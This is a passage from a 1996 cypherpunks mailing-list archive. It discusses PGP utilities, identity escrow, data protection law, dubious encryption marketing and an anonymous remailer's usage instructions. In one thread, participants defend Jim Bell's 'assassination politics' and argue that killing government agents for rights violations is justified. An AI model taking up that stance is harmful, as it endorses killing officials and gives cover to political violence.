                Telecommunications Reform bill (HR1555).
Aug  4, '95     House votes 421-4 to attach HR1978 to Telecommunications
                Reform bill (HR1555).
Jun 30, '95     Cox and Wyden introduce the "Internet Freedom and Family
                Empowerment Act" (HR 1978) as an alternative to the CDA.
Jun 21, '95     Several prominent House members publicly announce their
                opposition to the CDA, including Rep. Newt Gingrich (R-GA),
                Rep. Chris Cox (R-CA), and Rep. Ron Wyden (D-OR).
Jun 14, '95     The Senate passes the CDA as attached to the Telecomm
                reform bill (S 652) by a vote of 84-16.  The Leahy bill
                (S 714) is not passed, but is supported by 16 Senators
                who understand the Internet.
May 24, '95     The House Telecomm Reform bill (HR 1555) leaves committee
                in the House with the Leahy alternative attached to it,
                thanks to Rep. Ron Klink of (D-PA).  The Communications
                Decency Act is not attached to it.
Apr  7, '95     Sen. Leahy (D-VT) introduces S.714, an alternative to
                the Exon/Gorton bill, which commissions the Dept. of
                Justice to study the problem to see if additional legislation
                (such as the CDA) is necessary.
Mar 23, '95     S314 amended and attached to the telecommunications reform
                bill by Sen. Gorton (R-WA).  Language provides some provider
                protection, but continues to infringe upon email privacy
                and free speech.
Feb 21, '95     HR1004 referred to the House Commerce and Judiciary committees
Feb 21, '95     HR1004 introduced by Rep. Johnson (D-SD)
Feb  1, '95     S314 referred to the Senate Commerce committee
Feb  1, '95     S314 introduced by Sen. Exon (D-NE) and Gorton (R-WA).

________________________________________________________________________
FOR MORE INFORMATION

Web Sites (roughly in alphabetical order)
        URL:http://www.vtw.org/
        URL:http://www.cdt.org/cda.html
        URL:http://www.cpsr.org/
        URL:http://www.eff.org/pub/Alerts/
        URL:http://epic.org/

Email:
        cda-info@cdt.org (General CDA information)
        cda-stat@cdt.org (Current status of the CDA)

________________________________________________________________________
LIST OF PARTICIPATING ORGANIZATIONS AND BUSINESSES

In order to use the net more effectively, several organizations have
joined forces on a single Congressional net campaign to stop the
Communications Decency Act.  Because the list is so long, we've been
forced to omit many fine organizations.  See the VTW Free Speech Web Page
at URL:http://www.vtw.org/speech/ for the whole list.


Public Interest Organizations                     Businesses

Voters Telecommunications Watch (VTW)           | ECHO (www.echonyc.com)
                                                | Hotwired (www.hotwired.com)
Center For Democracy And Technology  (CDT)      | Mindvox (www.phantom.com)
Center for Public Representation  (CPR)         | Panix (www.panix.com)
Computer Professionals for                      | The WELL (www.well.com)
        Social Responsibility (CPSR)            | Wired (www.wired.com)
Cyber-Rights Campaign                           +-------------------------
Electronic Fronter Foundation (EFF),
   and independent regional Electronic
   Frontier organizations
Electronic Privacy Information Center (EPIC)
 Feminists for Free Expression                  Hands! Off The Net
Internet Users Consortium (IUC)                 Joint Artists' and Music
The Libertarian Party (LP)                       Promotions Political Action
National Campaign for Freedom of Expression      Committee (JAMPAC)
National Coalition Against Censorship (NCAC)    National Gay and Lesbian
National Writers Union (NWU)                     Task Force (NGLTF)
People for the American Way (PFAW)              Republican Liberty Caucus

________________________________________________________________________
        End Alert
========================================================================








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ted Garrett <teddygee@visi.net>
Date: Thu, 8 Feb 1996 04:25:53 +0800
To: jims@conch.aa.msen.com
Subject: Re: Windows PGP mail reader
Message-ID: <2.2.32.19960207092918.007298b4@mail.visi.net>
MIME-Version: 1.0
Content-Type: text/plain


At 09:56 PM 2/3/96 GMT, you wrote:
>In article <4eaksb$6i9@recepsen.aa.msen.com>, jims@conch.aa.msen.com says...
>>Hi.  Can anyone recommend a Windows based email/POP3 reader that can decrypt
>>content?  Please reply  via email:
>
>Have a look at Pegasus Mail.  It handles PGP very nicely with a recent
>addition. by John Navas, both are free:  
>http://users.aimnet.com/~jnavas/winpmail.htm
>

I recently picked up "PGP Windows Shell".  I have found it to be an excellent utility for encrypting and decrypting messages as easily as cutting to and pasting from the clipboard.  All operations are automated, you can use whatever mailer you want, and it's freeware.  The URL is http://iquest.com/~aegisrc/utils2.shtml 

Also, if you want something to automate usage of the cypherpunk style remailers, check out Joel McNamara's Private Idaho.  It's an excellent tool, also freeware, and is available at URL http://www.eskimo.com/~joelm/pi.html

Another utility you might like to look at (of course it's freeware too) is PGP WinFront.  While it's a little more cumbersome than PGP Windows Shell, it has all the same functionality.  There is also a shareware utility available from the same URL, called PGP QuickFront.  The combination of QuickFront and WinFront make using PGP under windows almost pleasant.  It can be found at http://netaccess.on.ca/ugali/crypt/ .






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: A5113643667@attpls.net (Tom Jones)
Date: Thu, 8 Feb 1996 07:56:20 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: Digital watermark
Message-ID: <882BCBB6>
MIME-Version: 1.0
Content-Type: text/plain


Dear Cypherpunks,

Has anyone heard any news lately about digital watermarks, that is,
changes to the image that can be used to identy the source of the
document?

Peace ..Tom





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Thu, 8 Feb 1996 00:43:46 +0800
To: jimbell@pacifier.com>
Subject: Re: Reasons in support of crypto-anarchy WAS Re: Why am I  wrong?
Message-ID: <199602071621.IAA18512@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 03:43 AM 2/7/96 -0800, lunaslide@loop.com wrote:
> Now, in respose to Mr. Bell.  As I stated above, I found your proposal
> [assasination politics] absolutely facinating, to say the least.  
> [...] 
> However, I must point out, and I'm sure you realize this, that it would not
> be adopted by the public at large for some time to come, or more likely
> never.  There are too many people who believe that it is wrong to take a
> life for any reason and that no action justifies death. 

This, of course, explains why war is impossible these days and why the public
is outraged whenever the government executes a murderer.

        :-)


 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Thu, 8 Feb 1996 01:07:38 +0800
To: cypherpunks@toad.com
Subject: Re: [noise] the individual and the tribe
Message-ID: <199602071645.IAA22893@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


>Rob said:
>> ... in the sense that
>>tribal societies are individualist.

Jean-Francois Avon (JFA Technologies, QC, Canada) wrote:
>I absolutely don't agree.  The subordination of the individual to the tribe
>is fundamental of their vision of the world. 

Some tribal societies are individualist, some are not:  Most of the
myths and legends of the Australian Aboriginals have a lone ranger
character as the hero or villain, or at least most of the ones
that I have read feature a person whose life is dramatic or heroic in part
because he is tribeless, perhaps for the same reason as most heroes
in Disney cartoons are orphans.


 Individualism is not about the
>personnal opinions, it is about the vision of Man as an entity in itself, not
>a type of cattle that owe his service to the collectivity of the tribe.
>
>Crypto makes the tribe (and it's sorcerers) loose their grip... :)
>
>JFA
>
>
>
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <wlkngowl@unix.asb.com>
Date: Thu, 8 Feb 1996 00:49:04 +0800
To: cypherpunks@toad.com
Subject: A Warning Re: Hardware RNG support for PGP 2.63
Message-ID: <199602071624.LAA20523@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

rngaugp@alpha.c2.org wrote:

> Here is the README file that comes with the modifications.
> - ------------------------------------------
>                Hardware Random Number Support for PGP.
>                    PGP 263 international version
> 
> Ever get tired of typing in keyboard timing strokes while generating a
> PGP key? Ever want to use PGP unattended, but be foiled because there is
> no one there to type the keyboard timing strokes?
> 
> Ever wonder if PGP's method of generating random number might have some
> subtle flaw which would expose it to cryptanalysis?[..]

Ever wonder that a random number device driver or hardware will have a subtle 
flaw???

Relying on the /dev/random NOISE.SYS driver now while it's still in beta 
isn't nec. a good idea.  For experimentation, sure.  I'm also rather
concerned as to how this version of PGP handles it.  Very much so.

The current and latter versions of NOISE.SYS parallels the Linux random.c 
driver in that there are two devices, /dev/random and /dev/urandom... the 
older versions (pre version 0.4) will return as many bytes as are requested 
(from /dev/random) whereas the current version returns only as many bytes as 
are conservatively estimated to be "truly random".

If you are using the older NOISE.SYS /dev/random or the newer version's 
/dev/urandom for key generation then essentially you're using a pseudo-RNG 
based on SHA rather than real random data.

The implementation should try to get as many bits as are needed from the 
driver and then request some keystrokes, collect more data, etc. until you 
have enough bits (advantage over older PGP method? You only need to sample 
from driver, and not worry about processing raw samples yourself; driver also 
samples from other sources than keystrokes as well...)

I'd be wary of relying on NOISE.SYS or any similar driver for PGP-key 
generation until the driver gets more thorough examination; I'd also be VERY 
wary of an improper use of the driver.


- --Rob (who wrote NOISE.SYS).
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMRjSNSoZzwIn1bdtAQEn+wF/ZxQKqOCRyKrJjmdtYtE2kVG6v+3NkOOb
84JMpWkpzkMVe8L7LHr7bLdgzkVxDB+8
=m54+
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "A. Padgett Peterson, P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Date: Thu, 8 Feb 1996 01:43:12 +0800
To: lunaslide@loop.com
Subject: RE: Why am I wrong?
Message-ID: <960207115456.20213b69@hobbes.orl.mmc.com>
MIME-Version: 1.0
Content-Type: text/plain


(Was referring to the govs ability to control communications *with them*) 
>Perhaps I do not understand your point.  They can perhaps
>control the communication between them and me, but not between me and
>everyone else.

Ok please view my three points fromn the standpoint that so much of the 
total traffic would be affected by at least one, that "uncontrolled"
communications would be minimal.

>>2) communications using someone else's equipment/network (university,
>>   employer, etc)

>Employers nor universities have any jurisdiction over whether you use
>encryption in your transmissions while using their networks unless it
>specifically does not allow it when you first agree to have an account with
>them.

I think you had better review the concept of "property rights". Unless you
have a contract that says you can, or can establish "expectation", the
property owner who allows you to use their equipment may control how it is 
used.

>>3) communications with anyone (Internet merchant, etc) who says "this
>>   is not what <MasterCard|Visa|AmEx> approves..."

>I don't quite understand your meaning.  I am a merchant and I encourage my
>customers to use PGP when they send information over the internet, whether
>to me or to anyone else. 

That is fine but what if MasterCard refuses to accept this method ? (Not
saying they will, just "what if" ? You are free to use digicash if you
want but is not "legal tender for all debts public and private".

>Comments?  Bring 'em on! :-)

I dood it.
					Warmly,
						Padgett





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "A. Padgett Peterson, P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Date: Thu, 8 Feb 1996 01:22:57 +0800
To: cypherpunks@toad.com
Subject: Strong Crypto Weak
Message-ID: <960207115847.20213b69@hobbes.orl.mmc.com>
MIME-Version: 1.0
Content-Type: text/plain



>The seven experts who wrote the new paper -- "Minimal Key
>Lengths for Symmetric Ciphers to Provide Adequate
>Commercial Security" -- say the achievement by the
>students at the Ecole Polytechnique was trivial. 

For this they needed "designated heros" ? Have been saying the 
same thing for two years.
						Warmly,
							Padgett




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 8 Feb 1996 03:26:01 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Internet Passports, Identity Escrow, and Back Doors
Message-ID: <ad3e30c40602100407a8@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


lmccarth@cs.umass.edu risks violating the terms of his PC probation by writing:

>I just sent this to the remailer operators' list, but it may be of interest
>here too. I think Tim or Lucky or someone suggested something like GAI
>(Government Access to Identities) here a while back....
>
>Forwarded message:
>> Lance writes:

>> I hypothesize that the Strassmann & Marlow paper is meant to lay the
>> groundwork for some sort of eventual Government Access to Identities proposal
>> (which would more likely be termed "identity escrow" by the Feds). It's
>> about the only way I can reconcile statements like the following
>> (juxtaposed by me, not them):

Indeed, several of us have written extensively about the rationales for
"is-a-person" credentialling by government, what I have quipped is a kind
of "identity escrow" (further abusing the term "escrow").

I lack the time to write a concise summary, so will instead mention a bunch
of points. Searching the archives for mentioned terms may yield more
comprehensive articles.

* "Internet Driver's License." This is not just a joke, although the
reported systems are not called this. But the idea is the same. A
credential, probably a signed key certificate, that is granted after proof
of age is presented. (For example, one might show a passport or
conventional Driver's License at a Post Office and they'd issue a signed
key....something they'd like to get into the business of doing, from
various reports.)

* An age credential such as this is essentially going to be necessary, in
the worst case, for accessing the Net and Web. If the CDA is upheld--which
may take several years to decide for sure--then sites will probably have to
take positive steps to verify that users are not minors. Unless they carry
only G-rated Barney material (but no Barney jokes, as children might be
traumatized).

* This age credential obviously cannot be just the "I swear that I am old
enough to view adult images" sort of click button. (Although it mostly
works with ordering adult material through the mail to immunize a provider,
except in this case there is the additional "check" of mail delivery, where
a postal carrier may may informal inquiries about the age of the recipient.
Plus the parents can intercept the subscription to "Hustler" that
14-year-old Johhny ordered.)

* The various schemes for signature authorities, which I admit to not
following very closely, all the stuff about Verisign and whether Netscape
will or will not accept signatures of rogue signers....all this suggests a
worrisome situation in which all messages must be signed by the True Name
(see above) of the message originator.

(For a good fictional treatment of this, see John Brunner's "The Shockwave
Rider.")

* Remailers and Web proxies obviously represent an end-run around the CDA
and key escrow, in various ways, so I think it likely that these will come
under attack. The legal means of attacking them may be one or more of the
following:

- holding the remailer site operator legally responsible for what can be
traced back to his system, especially if in plaintext. (This would make the
last site in a chain of otherwise-encrypted messages especially vulnerable
if the message is delivered in plaintext to the recipient. Of course, with
wider use of crypto, the message can be delivered in encrypted form. I see
more and more remailers insisting on encrypted (high entropy) messages.)

- for sites that charge any kind of fee for remailing, extensions of the
business laws to require that logs be maintained ("so that customers can
dispute bills"!!). These logs could then be subpoenaed to aid in tracing
messages back to origins. (Sure, it gets hard when hops outside the country
are involved...I'm not saying this'll be easy or effective, just a possible
avenue of attack on remailers.)

- finally, outlawing of remailers and proxies. Or extensive registration of
them. (We've had this debate a couple of times, about whether
mail-forwarding services really have to register, get proof of ID, send
records along to the government, etc.)

* Identity Escrow obviously fits in closely with key escrow in general.

In closing, I think the next couple of years will see increasing pressure
to require some kind of "Internet Driver's License," at least within the
U.S. Other countries will jump at this (Germany, China, France, the usual
suspects). Call it an "Internet Passport."

For some interesting insights into the thinking of some in the crypto
community, go back to around 1986-8 in the "Crypto" Conference Proceedings
and you'll find some papers, by Fiat and Shamir I believe, on the "problem"
of "rogue governments" (they cited Libya for their example) issuing "false
passports."

(I have commented in the past that the U.S. government has a reported
50,000 or more people in the Witness Security (aka Protection) Program,
under the U.S. Marshal's Service, and reserves the right to create
completely fake "legends" (dossiers) for these people, including false
credit records, false education records, and false employment records. Not
to mention their various secret agents. Clearly the government would want
"back doors" into any Internet Passport system!)

--Tim May


Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter Conrad <conrad@unix-ag.uni-kl.de>
Date: Thu, 8 Feb 1996 01:26:00 +0800
To: cypherpunks@toad.com
Subject: Re: Fair Credit Reporting Act and Privacy Act
Message-ID: <199602071139.MAA05424@pizza.unix-ag.uni-kl.de>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hi,

Duncan Frissell wrote:
>At 08:25 AM 2/5/96 -0500, Frank Willoughby wrote:
>
>>If the Privacy Act were rewritten to be as strict as the BDSG, businesses
>>would have a (mandatory) legal requirement to:
>>
[...]
>Unfortunately, it would also:
>
>*  Require government registration of computers and databases containing
>information about people (whether these computers are used by business or
>individuals).  This eases regulation of computers and future confiscation.

This is not true. Individuals are not required to register anything, the
BDSG simply does not apply do them (see. Par. 1 Section (2) ).
Businesses are required to register (besides their address and the kind
of business they do) a person who is responsible for any personal
information they want to keep and a general description of the kind of
data they intend to keep (see Par. 32 Sect. (2) ).
Computers are hardly mentioned anywhere in the BDSG, in fact, most of it
applies to any method of processing personal information. It doesn't
matter if a business keeps data printed on paper or stored in a computer.

>*  Reduce market efficiency by making it harder to match buyers and sellers
>(because neither could easily find out about he other) thus causing higher
>prices and poorer people.

Oh well. In the past buyers and sellers have always found each other
without keeping large databases. Most buyers are quite capable of finding
appropriate sellers (that's what advertisement and commercials are good
for).  The goal of the BDSG is to give the individual control of information
kept about him.
An example: The Deutsche Bundesbahn issues so-called 'BahnCards'. If you
buy a BahnCard you can use the Bundesbahn-trains for half the normal price.
Until a couple of months ago, the Bundesbahn gave all the information they
got from their BahnCard customers to the Citybank AG. The Citybank AG
sent their junkmail to all Bahncard customers and tried to make them get
a credit-card. This was in violation of the BDSG. And I still know where
to get a credit-card if I want one.

>*  Do nothing to protect personal information from the government which
>would get to collect more of it than ever in the course of enforcing data
>protection laws.

Oh yes it does. The same rules (or even stricter ones) that apply to
businesses apply to all government organizations. If any government
organization (even the police) violates the BDSG you have the right to
file a lawsuit against the organization (or the individual who violated
your rights).

>If you don't want people to know things about you, don't tell them.

You sometimes have no choice.
Those of you capable of understanding german might take a look at

http://www.fh-ulm.de/bvd/gesetz.html

Bye,
	Peter

NB: I subscribe to this list through a digest only. Please CC: me on
    followups.
- -- 
Peter Conrad    | "They say time is the fire in which we burn."
Am Heckenberg 1 |                        Dr. Soran, Star Trek - "Generations"
56727 Mayen
Germany

         Email: p_conrad@informatik.uni-kl.de,conrad@unix-ag.uni-kl.de

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAgUBMRiPe7FFskV8RCVHAQEMwQP7B6/QSo0E8bAiPcusg9+Etzx+WdIi6nuP
WVvnJ7RWrwoScnPkRJs7uaBfCpedFu3TZX7RyOm6bVAX4mwFe/dtqhBxcy8U3lQg
fqa3WUAhyBNPcr6tF38sVocKs6hWRiw+KckzvnCx9grJpqVHz6kvimAcVOIg027O
Zzk8jyopYDw=
=PBa7
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nagina.cs.colorado.edu>
Date: Thu, 8 Feb 1996 04:19:00 +0800
To: cypherpunks@toad.com
Subject: POTP gets good press
Message-ID: <199602071956.MAA17880@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

The Sun Observer -- "An Independent Journal Devoted to the 
Sun and Compatible Markets" -- ran an article in the Feb 96
issue entitled "New technology eliminates need for keys to
encrypt e-mail messages".


Byline: Bob Harvey.  About the author:  "Bob Harvey is vice
president of the Internet Security Corp., a Lexington,
Mass.-based network security solutions provider."


Content:  includes diagrams entitled "Link Level Encryption"
in which sender transmits keys to receiver, and "Packet
Level Encryption" in which sender transmits key sto
certificate authority which transmits them to multiple
receivers, and "Synchronized Random Key Generation (SRKG)" 
a la "Power One Time Pad" in which no keys are transmitted 
and multiple recievers magically decipher messages via 
built-in encryption devices.


Am I right in thinking this is utter unmitigated
bullsh snake oil?  Does anybody have any other
dirt on this Bob Harvey guy and his Internet Security Corp?
What is his relationship with the POTP folks?  An Alta 
Vista search revealed several Bob Harveys, but none who 
matched with "Internet Security".


I'm Cc'ing this to the editor in chief of The Sun
Observer.  If he doesn't know about the cypherpunks he might
want to request some explanation...


Regards,

Bryce

                 "Toys, Tools and Technologies"
  the Niche 
        New Signal Consulting -- C++, Java, HTML, Ecash
            Bryce 
 
PGP sig follows



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMRkD8/WZSllhfG25AQESBgP8CmmKb0+VMqs14FNQ2YoAllXcaqAtc09Y
99KljeM0gHpm19x14Tj011bngS59EyUCDvoFaY6HtOmOPNqR2SpQxoHp9IBWNJmS
dGEGwuqCLEB2gxMwgtjrwCNWyJmXk6Wp8UTRPcoG/woXWBCkyllbc62dV/RbILva
OeKJR5FpQ9Y=
=YT6V
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Thu, 8 Feb 1996 05:47:34 +0800
To: bryce@colorado.edu
Subject: Re: POTP gets good press
In-Reply-To: <199602071956.MAA17880@nagina.cs.colorado.edu>
Message-ID: <Pine.SOL.3.91.960207131830.2562B-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 7 Feb 1996, Bryce wrote:

> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> Content:  includes diagrams entitled "Link Level Encryption"
> in which sender transmits keys to receiver, and "Packet
> Level Encryption" in which sender transmits key sto
> certificate authority which transmits them to multiple
> receivers, and "Synchronized Random Key Generation (SRKG)" 
> 
> Am I right in thinking this is utter unmitigated
> bullsh snake oil?  Does anybody have any other

It could be doing something SKIP like; if the certificates are DH certs, 
it could be using those to generate a shared secret, and combing that 
with an IV to generate a key.

hard to tell from the article

Simon




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 8 Feb 1996 11:06:56 +0800
To: "E. ALLEN SMITH" <ravage@ssz.com
Subject: Re: Reasons in support of crypto-anarchy WAS Re: Why am I (fwd)
Message-ID: <m0tkIVc-0008yqC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:05 PM 2/6/96 EDT, E. ALLEN SMITH wrote:
>From:	IN%"ravage@ssz.com"  "Jim Choate"  6-FEB-1996 22:50:35.24
>
>>What is described is not self-defence by any stretch of the imagination. It
>is a pre-meditated act which causes any plea of self-defence to fail.
>------------------
>	If someone has comitted serious enough violations of rights in the
>past, then I would call killing that person justified. First, it prevents any
>future violations of rights by that person. Second, it serves to discourage
>people if they know they can get killed if they do so. (I realize that
>capital punishment by governments doesn't appear to do much good, but the
>people in question- government agents, etcetera- are generally a bit different
>than the gang members who so regularly ignore prison sentences and the death
>penalty.) Third, and getting away from the self-defense argument, it is
>justice. The job of a government, if it has one, is to defend individual
>liberties. It is given privileges in order to enforce that. The abuse of such
>privileges should be met by death. (Yes, I would be in favor of changing
>current laws to remove sovereign immunity and institute a death penalty for
>governmental rights violations. Unfortunately, among the people subject to 
such
>a law are the ones making the laws.)

Thank you for such a well-written defense of my philosophy.

Clearly, the government is now out of effective control of the citizenry; it 
is hard for me to understand how anybody could fail to see this.  The system 
I describe, while it may appear to some to be extreme, is a sincere attempt 
to return control to the populace.


>------------------------
>
>>How many people have to decide that another should be killed for it to be
>ethical? In short, how many people does it take to decide it is a legitimate
>act to take your own life?
>----------------------
>	Why should "how many people" make a difference? If I violate someone's
>rights enough to justify such a course of action, then I should be dead 
even if
>everyone except the victim is cheering. Yes, I realize that Jim Bell's system
>does depend on a group of people. But so, in the end, do all such systems-
>whether they call themselves governments or anarcho-capitalist societies. If
>the Christian Coalition got too many people with guns in the latter, they'd
>rule.
>	Any further discussion would appear to belong in private email; I
>suspect that Jim Bell would appreciate a cc.
>	-Allen


Yes, please.  Frankly, Allen, it's a pleasure to see people really 
UNDERSTAND what I'm talking about!  You obviously do, better than mos
t.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Thu, 8 Feb 1996 10:45:57 +0800
To: bryce@colorado.edu
Subject: Re: POTP gets good press
In-Reply-To: <199602072228.PAA21832@nagina.cs.colorado.edu>
Message-ID: <Pine.SOL.3.91.960207143933.2562E-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 7 Feb 1996, Bryce wrote:

[original messsage]
> I, Bryce, wrote:
> ...
> > certificate authority which transmits them to multiple
> ...
[reply to my reply] 
> But this would entail a certificate authority to prevent
> MITM attack, right?  The article clearly claimed that POTP

I guess I ought to try and find the article; I took this line in your 
message to suggest that there was such a CA. Could you possibly type in 
the relevant bit of the original article (though I suspect there's not 
much in there anyway)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zinc <zinc@zifi.genetics.utah.edu>
Date: Thu, 8 Feb 1996 10:46:17 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Type I capabilities added to mix@zifi.genetics.utah.edu
Message-ID: <Pine.LNX.3.91.960207150602.12054S-100000@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

howdy folks,

the purpose of this message is to announce the addition of Type I
capabilities to the remailer at mix@zifi.genetics.utah.edu.
mix@zifi.genetics.utah.edu now supports the standard cpunk commands.

here's the section of the help file that pertains to the Type I
remailer, the whole help file available by sending a message to
mix@zifi.genetics.utah.edu with Subject: remailer-help.

the Type I remailer is Matt Ghio's code.  all commands are supported
EXCEPT usenet posting which would probably just get me in trouble.

the pgp key for the remailer is included in the message below.  in
addition, you can obtain the key by fingering
remailer@zifi.genetics.utah.edu. 

the whole help file is also available by fingering
mixmaster@zifi.genetics.utah.edu.

thanks,

- -patrick finerty


		  Part II - Type I remailer features

I have an automated mail handling program installed here which will take
any message with the proper headers and automatically re-send it anonymously.
You can use this by sending a message to mix@zifi.genetics.utah.edu, with the
header Anon-To: containing the address that you want to send anonymously to.
(Only one recipient address is permitted.)  If you can't add headers to your
mail, you can place two colons on the first line of your message, followed
by the Anon-To line.  Follow that with a blank line, and then begin your
message.  For Example:

> From: joe@site.com
> To: mix@zifi.genetics.utah.edu
> Subject: Anonymous Mail
>
> ::
> Anon-To: beth@univ.edu
>
> This is some anonymous mail.

The above would be delivered to beth@univ.edu anonymously.  All headers in
the original message are removed, with the exception of the Subject (and
Content-Type, if present).  She would not know that it came from Joe, nor
would she be able to reply to the message.

However, if Beth suspected that Joe had sent the message, she could compare
the time that the message was received with the times that Joe was logged
in.  However, this problem can be avoided by instructing the remailer to
delay the message, by using the Latent-Time header:

> From: joe@site.com
> To: mix@zifi.genetics.utah.edu
> Subject: Anonymous Mail
>
> ::
> Anon-To: beth@univ.edu
> Latent-Time: +1:00
>
> This is some anonymous mail.

The above message would be delayed one hour from when it is sent.  It is also
possible to create a random delay by adding an r to the time (ie +1:00r),
which would have the message be delivered at a random time, but not more
than an hour.

Another problem is that some mailers automatically insert a signature file.
Of course, this usually contains the senders email address, and so would
reveal their identity.  The remailer software can be instructed to remove
a signature file with the header "Cutmarks".  Any line beginning with the
same text at in the cutmarks header, and any lines following it will be
removed.

> From: sender@origin.com
> To: mix@zifi.genetics.utah.edu
> Subject: Anonymous Mail
>
> ::
> Anon-To: recipient@destination.com
> Cutmarks: --
>
> This line of text will be in the anonymous message.
> --
> This line of text will not be in the anonymous message.

You can add additional headers to the output message by preceeding them
with ##

> From: chris@nifty.org
> To: mix@zifi.genetics.utah.edu
> Subject: Nifty Anon Msg
>
> ::
> Anon-To: andrew@hell.edu
>
> ##
> Reply-To: acs-314159@chop.ucsd.edu
>
> A Message with a reply address.

By seperating messages with cutmarks, you can send more than one message
at once:

> From: me@mysite
> To: mix@zifi.genetics.utah.edu
> Subject: message 1
>
> ::
> Anon-To: recipient1@site1.org
> Cutmarks: --
> 
> Message one.
> --
> ::
> Anon-To: recipient2@site2.org
> 
> ##
> Subject: message 2
> 
> Message two.

The two messages will be delivered seperately.

For added security, you can encrypt your messages to the remailer with PGP.
The remailer software will decrypt the message and send it on.  Here is the
remailer's public key:

- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzEY6mQAAAEEAMqdj6BCAb95C7KDM7UWTieGdCWVNmI8sKcDdX5JIyBWGo7Y
hKnxF3OgO+sTxjeeabCG8xWHNe9w8CzXPbOBE3soEedvY+FqaRBYdO8a3Eex4nSp
WomnKtcKcBet7G93PErGf4srEwR1OqMRsi+1CbDayNSu6IDU2P69KCmvu47hAAUR
tCpsZWFkIHJlbWFpbGVyIDxtaXhAemlmaS5nZW5ldGljcy51dGFoLmVkdT6JAJUD
BRAxGOraTdCj+UbQAfkBAVu9A/4kPaTN84+giuDkeiqbwTRMGAUQZ3N65hSR6snt
cQp3cvpY30d4i8r3PiBR+5LUAsO/vrrGGyW106X/PHKQpb2lJ5SbcoJ+fMhMcBFc
/UPxkwJGbcc7ftBkrIUNVetPik8PoRTlzgbBSypv97HiApYdZc6fKr2NuLv8OhmG
fdWcEYkAlQMFEDEY6oX+vSgpr7uO4QEBoUMD+wfpS5YhYHfVp37iklOSYhQdzpcl
pefg/RxgroWMWMzLYCeMvcoqlCIEznfYA8fSEPsmVDH22lQvZaLSbXM5WQ1gpZsE
6qR5SicFI9oX5ciVa2M+KgH3sxwS9TDFqcWBSgSnWPHzDT1oUBI/PLI2k/FGN5Hq
rbYH2gPobLez9N9z
=ms21
- -----END PGP PUBLIC KEY BLOCK-----


To utilize this feature, create a message with two colons on the first line,
then the Anon-To line, then any other headers, such as cutmarks or latency,
then a blank line, and then the message.  Encrypt this with the remailer's
public key.  Then send it to the remailer, adding the header "Encrypted: PGP".
If you forget this, the remailer won't know that it needs to be decrypted.
Also be sure to use the -t option with PGP, or the linefeeds might not be
handled properly.

> To: mix@zifi.genetics.utah.edu
> From: me@mysite.org
>
> ::
> Encrypted: PGP
>
> -----BEGIN PGP MESSAGE-----
> Version: 2.3a
>
